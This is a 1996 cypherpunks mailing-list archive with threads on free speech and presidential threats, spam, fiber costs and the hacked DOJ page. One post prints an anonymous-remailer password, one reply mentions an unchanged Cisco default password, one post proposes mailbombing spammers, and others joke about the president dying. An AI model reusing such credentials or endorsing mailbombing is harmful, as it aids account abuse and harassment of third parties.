RFC-EDITOR@ISI.EDU.  Please consult RFC 1543, Instructions to RFC
Authors, for further information.


Joyce K. Reynolds
USC/Information Sciences Institute

...

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="mailserv@ds.internic.net"

Content-Type: text/plain
Content-ID: <960820082910.RFC@ISI.EDU>

SEND /rfc/rfc1984.txt

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc1984.txt";
        site="ds.internic.net";
        access-type="anon-ftp";
        directory="rfc"

Content-Type: text/plain
Content-ID: <960820082910.RFC@ISI.EDU>

--OtherAccess--
--NextPart--


-- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 23 Aug 1996 06:16:43 +0800
To: bdavis@thepoint.net
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608221826.OAA03492@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


perhaps we should all add a line to our sigs to the effect that we hope
he dies, and soon, natural causes, of course. Hmmm, what exactly does 
'natural death' include?

	-paul


> From cypherpunks-errors@toad.com Wed Aug 21 18:31:29 1996
> Date: Wed, 21 Aug 1996 14:47:57 -0400 (EDT)
> From: Brian Davis <bdavis@thepoint.net>
> To: Scottauge@aol.com
> Cc: cypherpunks@toad.com
> Subject: Re: Husband/Wife jailed for saying Clinton Sucks
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 661
> 
> On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
> 
> > Rush Limbaugh reports:
> > 
> > That a husband and wife are being jailed for yelling to Clinton "You Suck".
> > 
> > The Secret Service states additional words (yet un-uttered to the rest of us)
> > were mentioned that they deemed threatening.
> 
> 
> "I hope you die."  And the couple was arrestd for disorderly conduct by 
> Chicago police.  Any possible federal charges for threatening a president 
> in violation of 18 U.S.C. Section 871 await a determination of the 
> seriousness of the statement, in context with the wife's conduct, by 
> prosecutors.  I predict no action.
> 
> EBD 
> 
> > 
> > Ahhh, good to live in a free country....
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 23 Aug 1996 06:19:26 +0800
To: shamrock@netcom.com
Subject: Re: HP supporting GAK, export controls
Message-ID: <199608221831.OAA03495@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


HP seems to have outlived their usefulness. sad, isn't it, when a really
first class operation has to die. and to go out in such a ignoble  way. 
the `ole boys' must not be resting well in their graves.

	-paul

> From cypherpunks-errors@toad.com Wed Aug 21 18:31:33 1996
> Date: Wed, 21 Aug 1996 14:11:34 -0700 (PDT)
> From: Lucky Green <shamrock@netcom.com>
> Subject: HP supporting GAK, export controls
> To: cypherpunks@toad.com
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1394
> 
> [Sorry, the last one went out without a subject]
> 
> HP is in the process of ramroding a pro-GAK, pro-export control 
> resolution through CommerceNet's public policy working group.
> 
> Here are the details.
> 
> HP is marketing several DES products that currently can not be sold 
> abroad. In order to be allowed to sell these products, HP is willing to 
> give the USG the following in return:
> 
> 
> 1.  Support by CommerceNet to have GAK built into the (inevitable) 
> domestic PKI. [Their presentation included the word "voluntary". When I 
> asked what was meant by that, I got the reply "There are many 
> interpretations of the word "voluntary"." Suffice to say there are 
> fundamental differences in what I mean by "voluntary" and what their 
> proposal would require the definition of "voluntary" to be.]
> 
> 2.  Support by CommerceNet for export restrictions on stronger forms of 
> crypto than DES as well as restrictions on export of crypto for products 
> not directly related (in HP's opinion) to ecommerce, such as email.
> 
> This ill conceived attempt to use CommerceNet's clout as industry 
> organization to liberalize export rules on HP's products, and those of a 
> few other companies supporting HP in this effort, at a heavy cost to 
> everybody else, must be stopped. Please let HP know how you feel about 
> their initiative and encourage CommerceNet to adopt an anti-GAK, 
> anti-export control position.
> 
> --Lucky
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 23 Aug 1996 06:16:24 +0800
To: mthompso@qualcomm.com
Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
Message-ID: <199608221833.OAA03498@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


as i recall, you are free to advocate almost anything, as long as you don't 
advocate it by violent means.

	-paul

> From cypherpunks-errors@toad.com Thu Aug 22 03:09:01 1996
> Date: Wed, 21 Aug 1996 14:58:32 -0700 (PDT)
> From: Michelle KC5KYO <mthompso@qualcomm.com>
> To: cypherpunks@toad.com
> Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1141
> 
> > I do not believe that freedom of speech in the U.S.A. extends to actively
> > agitating for secession or the overthrow of the federal government.
> 
> The right to discuss revolt or secession or the overthrow of the federal
> government, it seems to me, is given below:
> 
> "We hold these Truths to be self-evident, that all Men are created
> equal, that they are endowed by their Creator with certain unalienable
> Rights, that among these are Life, Liberty, and the Pursuit of 
> Happiness - That to secure these Rights, Governments are instituted
> among Men, deriving their just Powers from the Consent of the
> Governed, that whenever any Form of Government becomes destructive of
> these Ends, it is the Right of the People to alter or to abolish it,
> and to institute new Government, laying its Foundation on such
> Principles, and organizing its Powers in such Form, as to them shall
> seem most likely to effect their Safety and Happiness.  ... "
> 
> Now this is the Declaration of Independence, and not the Constitution, but
> it seems to me that the right to discuss "agitating for secession or the
> overthrow of the federal government" is protected.
> 
> Michelle
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 23 Aug 1996 06:13:42 +0800
To: jimbell@pacifier.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608221840.OAA03501@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


jimmy carter proved that we anyone could be president, and it looks
like clinton is proving that we don't really need a president.

	-paul

> From cypherpunks-errors@toad.com Thu Aug 22 03:09:20 1996
> X-Sender: jimbell@mail.pacifier.com
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Wed, 21 Aug 1996 14:36:23 -0800
> To: Brian Davis <bdavis@thepoint.net>
> From: jim bell <jimbell@pacifier.com>
> Subject: Re: Husband/Wife jailed for saying Clinton Sucks
> Cc: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1492
> 
> At 02:47 PM 8/21/96 -0400, Brian Davis wrote:
> >On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
> >
> >> Rush Limbaugh reports:
> >> 
> >> That a husband and wife are being jailed for yelling to Clinton "You Suck".
> >> 
> >> The Secret Service states additional words (yet un-uttered to the rest of 
> us)
> >> were mentioned that they deemed threatening.
> >
> >
> >"I hope you die." 
> 
> Doesn't sound much like a "threat" to me.
> 
> > And the couple was arrestd for disorderly conduct by 
> >Chicago police. 
> 
> It sounds to me like the Chicops were just showing their "loyalty" by 
> sitting on somebody, not that they believed any real crime had been committed.
> 
> > Any possible federal charges for threatening a president 
> >in violation of 18 U.S.C. Section 871 await a determination of the 
> >seriousness of the statement, in context with the wife's conduct, by 
> >prosecutors.  I predict no action.
> 
> But it isn't even a "threat", regardless of how "serious" it was.   The "I 
> hope you die"  part is, presumably, a statement of fact:  She did, indeed, 
> hope he dies.  But I don't see how hoping this can be considered a threat, 
> or even SAYING she's hoping this is, likewise.
> 
> 
> Makes me wonder whether visiting one of these appearances with a "Clinton 
> Doll" and a bunch of pins, and visibly inserting those pins into the doll 
> (while uttering various strange incantations), would constitute a "threat."
> 
> Frankly, I'd rather have a president who didn't feel the need to be 
> protected by thugs.
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Fri, 23 Aug 1996 05:52:32 +0800
To: asgaard@Cor.sos.sll.se (Asgaard)
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.HPP.3.91.960821144412.10644C-100000@cor.sos.sll.se>
Message-ID: <199608221447.OAA00185@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 20 Aug 1996, Timothy C. May wrote:
> 
> > There are technological fixes which I would favor over attempts to ban
> > unwanted messages.
> 
> In the meantime, before these technological fixes are easily implemented,
> what is the proper way to handle unwanted commercial mail?
> 
> 1) delete immediately
> 
> 2) reply with 'Fuck off, morons!'
> 
> 3) as in 2) plus an attachment of some 1Mb file
> 
> 4) as in 3) plus a CC to the postmaster of the sending site
> 
> What if the spam says: 'Do only reply to this if you want
> further contact with us' etc?
> 
> Does anybody have good advice, including risks for retaliation
> from the vendors/postmasters for such 're-spam'?

Informal law! The first content line could be "This is un-solicited mail". 
Then the MTA will remove it. Sender who doesnot put this line in his spam 
should be mailbombed. Though this kind of arrangement doesn't mean that spam
is nice thing if it has the line in it. 

- Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Fri, 23 Aug 1996 05:46:13 +0800
To: jims@MPGN.COM (James C. Sewell)
Subject: Re: Spamming
In-Reply-To: <2.2.32.19960821145232.006fe294@tansoft.com>
Message-ID: <199608221455.OAA00207@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
<Snip>
> No.  I think we can all (most) agree that spam-email is like junk-snailmail.
> In that case there are a few things to consider:
> 
>   1. Junkmail requires the SENDER to pay for it, not the recipient.
    Internet pricing models are complicated and debatable, but you surely
    end up paying for snail-junk-mail. Not directly, but hidden in the high
    first-class mail costs. More mail, more infrastructure, higher costs.
    This could be quite true for the net also, if we consider bandwidth costs
    money.
  
Vipul

--

Vipul Ved Prakash                       Voice   91 11 2247802
<vipul@pobox.com>                       Fax     91 11 3328849
      198 Madhuban, IP Extension, Delhi 110 092, INDIA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 23 Aug 1996 09:22:18 +0800
To: John Brothers <johnbr@atl.mindspring.com>
Subject: Re: telco's vs x-phones
Message-ID: <199608222206.PAA24858@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 8/21/96 -0400, John Brothers wrote:
>
>I think you both have good points here.  I will redo the math.
>
>At 09:19 AM 8/21/96 -0700,  Brian D Williams <talon57@well.com> wrote:
>>In a reply to Vipul Ved Prakash, Jim Bell wrote:
>>Siecore plain vanilla 36 fiber singlemode list $ 1.82 a foot, $5.46
>>a yard.  
>
>Jim said $10/meter, so about 50% of his estimate.
>
>
>>
>>>Each fiber pair should be able to handle approximately 1 million
>>>conversations at current data rates, or a total of 18 million
>>>conversations for that 18-pair cable, or 9.5 trillion 
>>>conversation-minutes.
>>
>>At current data rates (OC-48 Sonet) 32,256 voice channels per
>>fiber, 580,608 total for the fiber.
>
>Ok.. I think we're talking apples and oranges.  Jim uses the term 
conversation,
>which I assume is a 3 minute duration of time.  Your OC-48 handles almost
>precisely 1 million conversations per day.   (32k DS0 x 24 * 60 * 20)

My error was being off a deciminal point.  I was thinking around 6.4 
gigabits per second, which works out to 100,000 channels at 64,000 bits per 
second per channel, not 1 million.  

However, even my selection of 6.4 gigabits per second is arbitrary:  I have 
seen at least two ads for 80 gigabit (8 channels/fiber at 10 gigabits per 
channel) for fiber optic systems.  But my goal is not to make fiber look 
unrealistically good, but to generate a ballpark figure.


>>>Multiply this cost by 10 for right of way, trenching, repeaters,
>>>and other auxiliary hardware, or $100 per meter.  This is probably
>>>just a ballpark estimate, but...
>>
>>Off by a factor of at least 10 not counting switching equipment.
>
>So, assume that he's a long haul carrier, and doesn't have to buy any
>switching equipment.   Still, based on  $500/meter, that means 
>that this network cost about 2.5 billion to build.

Even long-haul carriers must have SOME switching equipment.  But as you 
note, my point is that the difference between local and LD costs is simply 
the fact of the insertion of some arbitrarily large amount of fiber trunk 
between the local switches.  LD companies still deserve to be paid, but the 
AMOUNT that they are paid maybe should drop to an arbitrarily low level as 
their costs drop.


>So if the system was running at full capacity, 24/7/365, the LD will have
>to charge $0.50/conversation, or $0.15/minute to make 2.5 billion per year.
>
>Even reaching 10% of that capacity is unlikely at $5/conversation.
>
>Which, clearly, isn't happening.  I assume that either I have made a 
>mistake in my calculations, or the costs of laying fiber has been 
>grossly overestimated...


Yes, I think the costs laying fiber are still a bit opaque.  The main reason 
one of the first alternative telephone LD services (Sprint) was that it was 
the creature of Southern Pacific Railways, who (obviously) owned a large 
amount of (ta da!) RIGHT-OF-WAY. And, more particularly, right of way that 
was well-connected, easily accessible, and easily diggable to install the 
fiber.  They decided they were going to put in a fiber communications system 
for the railroad, and at some (early?) point realized that since the cost of 
the trenching and fiber is basically fixed, so turning it into an LD service 
was going to be relatively straightforward.


>Or, that since no-one is going around and buying
>up 5000km right of ways, Sprint, MCI, AT&T and co. can lay fiber
>much more cheaply.  If we assume $50/meter, it will cost 250 million, and they
>will have to charge $0.015/minute to break even at 100% capacity, or 
>$0.15/minute at 10% capacity - and we know Sprint charges less than that,
>but if they can get more than 10% of the capacity --- although it is doubtful.

(I think you still need to go back and re-check some of your figures.  Yes, 
I did make that decimal point error, but I think you've added a few 
(different) errors of your own.) 

Now, keep in mind that a little perusing of these numbers (even if they are 
not exact) reveals an few interesting facts:

The cost of doing the right-of-way/trenching is essentially independant of 
the number of fibers that you intend to lay.  Moreover, the cost of the 
fiber itself is very low.  In other words, everything being equal, you want 
to pack as many fibers into a trench as you can.  Add to this, the fact that 
you can provide a way for fiber in a buried conduit, and later (years?) blow 
in new fiber.  The line I saw installed, "up close and personal," had three 
separate ways for cable, and the one cable being installed immediately was 
36 fibers.  Had two similar fibers been installed in the other ways, that's 
108 fibers, and at 2.4 gigabits per second, that's about 54x40,000 
simultaneous bidirectional conversations, or 2.16 million.  There are 
probably very few communications corridors that need more capacity than this.

 The obvious limit of this is that there is only a fairly limited demand for 
bit transmission (at least, compared with the capacities possible with 
fiber).  In addition is the fact that once you have modern-quality fiber 
installed, you can increase capacity by changing the optics/electronics.  It 
wasn't too many years ago that 400 (?) megabits/second or so was a fairly 
standard rate.  2.4 gigabits/sec supplanted it a few years ago, and speeds 
substantially greater than this are straightforward today.  AT+T claims to 
supply fiber now, and electronics/optics within a few months, to allow 80 
gigabits per fiber, or about 32 times more than 2.4.  

This should immediately explain why you aren't seeing a lot of trenching:  
Except for the natural desire among engineers to duplicate trenches along 
major routes to protect against "trencher fade" (accidental cuts), it won't 
really pay to put in more than a couple trenched routes between most major 
cities, if they're separated by "boonies."  It's far more economical for 
multiple companies to share a single route, or a pair of routes.  (there is 
an obvious exception if the whole area is developed, such as extended 
corridors like Washington/New York/Boston.)


>My best assumption at this point is that we don't have to make back the entire
>cost of the fiber per year to make a profit.  if we only have to earn 20%
>of its value to make a 10% profit, it would bring the price down to
>$0.075/minute, and if we were to get OC-768 systems invented, we could reduce
>that to $0.005/minute, which is approaching the values that Jim derived.

The value of an investment is compared to the average interest rate paid.  
However, that's probably too conservative with a fast-changing market like 
telecom today.  Even so, if a system paid back profit at 10% of the 
investment per year, it would probably be considered a very profitable 
investment, and I agree with your figure of 20% before fixed costs.

>So, I hate to say it, but it looks like long distance is more expensive
>than Jim (or I) thought.  But, in a few years (say, 5) it will approach
>ridiculously cheap.  We can expect at that point that either
>a) All (or most) long distance will be over the Internet
>b) Internet phone will vanish as regular long distance becomes a flat fee
>   like local service.

Probably closer to the latter.

The main lesson from these calculations is that fiber's costs are almost 
entirely based on their one-time installation cost, not a continuing 
maintenance cost.  True, the installation must be paid for, but that 
translates into an interest charge that is very low.

In view of the fact that the billing for telephone is supposedly half of  
the phoneco's cost, it will make sense that all telephone service will turn 
into a flat monthly fee, "enforced" by the possibility of Internet telephone 
for the few recalcitrant companies/countries who resist the transition.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 23 Aug 1996 09:04:33 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
Message-ID: <v02140b03ae427b8a5793@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


vipul@pobox.com wrote:
> > At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
> <Snip>
> > No.  I think we can all (most) agree that spam-email is like junk-snailmail.
> > In that case there are a few things to consider:
> >
> >   1. Junkmail requires the SENDER to pay for it, not the recipient.
>
>     Internet pricing models are complicated and debatable, but you surely
>     end up paying for snail-junk-mail. Not directly, but hidden in the high
>     first-class mail costs. More mail, more infrastructure, higher costs.
>     This could be quite true for the net also, if we consider bandwidth costs
>     money.

Actually I believe that without "junk mail" costs for regular postage would
probably be higher: less mail = fewer packages over which to amortize the
cost of building the infrastructure necessary for ubiquitous messaging.
Direct-mail organizations get a lower rate by doing a lot of the expensive
parts of post office work themselves (pre-sorting the mail by zip code,
barcoding messages, etc) and not necessrily just based upon volume.  For all
the bitching Americans do about the high cost of first-class mail it is still
the least expensive of any western  nation and offers fairly good service
(and the USPS actually made a profit for the last two years so it is unlikely
that the cost will go up for a while...)


jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Fri, 23 Aug 1996 07:05:56 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: [NOISE] Mysterious Numbers in Hacked DOJ Pages
Message-ID: <Pine.SCO.3.93.960822144544.19218D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


This should be good for a conspiracy thread or two:

I've noticed that nobody seems to be taking credit for the DOJ hack.  In
studying the hacked page (I thought maybe they'd leave a clue as to who
they were), I noticed that on the top right corner of the page, there are
two sets of numbers.  The first says "1020" and the second says "757." 
The are stored in the same .JPG file, 1020757.jpg.  In poking around the
HTML source, the following appears in the source code, but not on the
actual page when it's in a browser (HTML source comments): 

<! Why did you betray us? Why are you taking our rights? What ever
happened >
<! to the law of the land? 757 1020 >

Note that this time, the numbers are in the reverse order.  (Also note
that 202.757.1020 does not appear to be the DOJ phone number - I tried). 

For all I know, these numbers are relevant to the CDA or some other
legal/legislative source.  Or maybe I'm missing something really
obvious.

Anyone have any insight into what the numbers actually mean?  Could there
be some crypto (key?) relevance here that we're missing? 

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Thu, 22 Aug 1996 23:56:49 +0800
To: cypherpunks@toad.com
Subject: Anonymous password changed.
Message-ID: <9608221230.AA08592@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the replacement or assignment of your anonymous password.
Your password is now x4anarchy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Fri, 23 Aug 1996 10:18:41 +0800
To: pjb@ny.ubs.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608221826.OAA03492@sherry.ny.ubs.com>
Message-ID: <Pine.3.89.9608221607.A24089-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996 pjb@ny.ubs.com wrote:

> perhaps we should all add a line to our sigs to the effect that we hope
> he dies, and soon, natural causes, of course. Hmmm, what exactly does 
> 'natural death' include?
> 
> 	-paul

When I read this, a quote from a certain famous sci-fi writer came to mind:
"All forms of death are ultimately due to heart failure."


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Fri, 23 Aug 1996 08:54:39 +0800
To: vipul@pobox.com
Subject: Re: Spamming
Message-ID: <2.2.32.19960822220224.006a0ff0@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 02:55 PM 8/22/96 +0000, Vipul Ved Prakash wrote:
>> 
>> At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
[deleted]
>>   1. Junkmail requires the SENDER to pay for it, not the recipient.
>    Internet pricing models are complicated and debatable, but you surely
>    end up paying for snail-junk-mail. Not directly, but hidden in the high
>    first-class mail costs. More mail, more infrastructure, higher costs.
>    This could be quite true for the net also, if we consider bandwidth costs
>    money.

I beg to differ.  The USPS considers "junk" mail their bread-and-butter.
Huge mailings of all manner of bulk mail (especially those that are PostNet
barcoded by the sender) pay the bills around the Post Office.  Your "more
mail, more infrastructure, higher costs" argument is flawed.  The post
office has many fixed costs related to maintaining their huge presence,
delivering to so many rural addresses.  If we had to pay a per-letter basis
*discounting* the value provided by the infrastructure already in place
supporting the bulk-mail handling systems, we'd be paying roughly Federal
Express 2-day letter rates for each piece of mail (around $6.00, if memory
serves correctly.)

I do not say this to begin yet another "Privatize the USPS" rant.  I also am
not interested in whether or not the USPS should be privatized, have its
criminal law protctions stripped, or even if the postmaster general should
report our stamp purchasing habits to Janet Reno.  All I'm saying is that
the above statement ("junk mail = higher costs") is false.

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 23 Aug 1996 10:15:33 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [rant] Re: Spamming (Good or Bad?)
In-Reply-To: <2.2.32.19960821203026.00c82314@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960822172809.170A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Alan Olsen wrote:
> At 05:49 PM 8/20/96 +0000, Ross Wright wrote:
> >On Or About 20 Aug 96, 16:23, Jim Gillogly wrote:
> >> Vipul Ved Prakash <vipul@pobox.com> writes:
> >> >I don't know if there has been much discussion on the ethics of
> >> >spamming here? Is spamming free speech? 
> >> I oppose spamming because it's rude and inefficient, lowering the
> >> S/N everywhere it happens.  Market droids
> >Market Droids????  As a salesman I take offence at this slur.
> It is a mild term compared to some of the things that could be said about sales.
> I have dealt with far too many sales people.  Few of them knew anything
> about the products that they were selling.  (This is especially true of the
> computer field.  "Do you know the difference between a computer salesman and
> a car salesman?  The car salesman knows how to drive.")

     The way I heard it was that the Car Salesman knew he was lying. 

> But then, rarely does truth enter into the matter of sales...
> Sales people have a bad reputation for a very good reason.  If they actually
> had a basic understanding of what they were selling, and were not so
> untrustworthy as to not commit to things that are not deliverable, they
> would have that reputation.

     Then they would not be sales people. Good salesmen are like good 
governments. Very Very Rare. 


o.b. Crypto: Uh...Uh...Uh... Testing one way hashes on SalesDroids. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 23 Aug 1996 10:58:13 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: [NOISE] Mysterious Numbers in Hacked DOJ Pages
In-Reply-To: <Pine.SCO.3.93.960822144544.19218D-100000@grctechs.va.grci.com>
Message-ID: <Pine.GUL.3.95.960822171259.26464D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996, Mark O. Aldrich wrote:

> This should be good for a conspiracy thread or two:

I'm game.
 
> I've noticed that nobody seems to be taking credit for the DOJ hack.  In
> studying the hacked page (I thought maybe they'd leave a clue as to who
> they were), I noticed that on the top right corner of the page, there are
> two sets of numbers.  The first says "1020" and the second says "757." 
> The are stored in the same .JPG file, 1020757.jpg.  In poking around the

Try the 908 area code, from which the initial report to alt.2600 came. I
haven't tried the number, because I don't want to incriminate myself, but
757 appears to be a valid exchange. 

The Cisco 1020 has a default password that some people forget to change.

A Boeing 757 went down under mysterious circumstances recently. The time was
approximately 10:20 AM. Why hasn't the press reported whether a close
Clinton associate involved in the Mena affair was aboard that plane? Hmmmmm.

Add the numbers up and you get 1777, "the shot heard 'round the world."

What was going on in Area 51 last week?

1-888-757-1020 is mysteriously "unreachable" now.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 23 Aug 1996 09:05:38 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <1Ri2sD70w165w@bwalk.dm.com>
Message-ID: <Pine.SV4.3.91.960822174814.21784B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Alaska rightfully belongs to Russia

The Aleuts still study Russian in their schools and use it in Church.

Mr Zhieranovsky (spelling) who recently pointed that out during the 
run-up to the election campaign, also mentioned his prelimiary plan to 
reverse the net population loss of ethnic Russians: He'd father a child 
in every province.

The dude has got my vote.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Aug 1996 10:26:36 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608221826.OAA03492@sherry.ny.ubs.com>
Message-ID: <Rc23sD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


pjb@ny.ubs.com writes:

> perhaps we should all add a line to our sigs to the effect that we hope
> he dies, and soon, natural causes, of course. Hmmm, what exactly does 
> 'natural death' include?

AIDS.

And don't forget to mention that he sucks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 23 Aug 1996 11:39:57 +0800
To: cypherpunks@toad.com
Subject: Re: Republican and Democratic party platforms [NOT!] on technology
In-Reply-To: <Pine.GUL.3.95.960822120928.25102B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960822175518.29018L-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I never really liked having my ass kissed much, so I'll find out the 
truth tomorrow.

I got a fax sent from a Senate office yesterday saying that it was in the
platform, even though it doesn't appear (yet) on the rnc.org web site --
a fact you'll note I mentioned in my original message. 

It was a good rant, though, Rich. Nicely done.

-Declan




On Thu, 22 Aug 1996, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 22 Aug 1996, Declan McCullagh wrote:
> 
> > But the benefit of having a pro-privacy statement in the platform (which in
> > fact was watered down significantly from that originally proposed by
> > advocates on our side) is that the platform covers Republican Party
> > candidates for any office, not just the presidency.
> 
> One Republican staffer sent you an ass-kissing note quoting an ALLEGED piece
> of the platform WHICH IS NOT ACTUALLY THERE. The platform was finalized on
> August 12th. The text you quoted is not even in the list of rejected
> amendments. I assume that either you or the staffer you talked to innocently
> mistook some Senator's position paper for the platform; it's hard to believe
> that anyone would intentionally lie about something that is so trivial to
> check.
> 
> Even if the text you passed on were part of the platform, I fail to see the
> importance of a feel-good statement in a platform that the party's
> presidential candidate CLAIMS NOT TO HAVE EVEN READ.
> 
> Also from the Republican Platform (perhaps out of context, but unlike the
> text some anonymous alleged Republican staffer sent you, this is actually
> in the platform): 
> 
> [...]
> 
> In a Dole Administration, U. S. Attorneys will prosecute and jail those who
> prey upon the innocent. We support upgrading our interdiction effort by
> establishing a Deputy Commissioner for Drug Enforcement within the Customs
> Service. We will intensify our intelligence efforts against international
> drug traffickers and use whatever means necessary to destroy their
> operations and seize their personal accounts.
> 
> We support strong penalties, including mandatory minimum sentences, for drug
> trafficking, distribution and drug-related crimes.  Drug use is closely
> related to crime and recidivism. Drug testing should be made a routine
> feature of the criminal justice process at every stage, including the
> juvenile justice system. Test results should be used in deciding pretrial
> release, sentencing, and probation revocation.
> 
> [...]
> 
> Terrorist states have made a comeback during Bill Clinton's Administration. 
> He has treated their rulers with undue respect and failed to curb their
> acquisition of weapons of mass destruction.  Although congressional
> Republicans passed anti-terrorism legislation earlier this year, the Clinton
> Administration has not implemented many key provisions of the law. It has
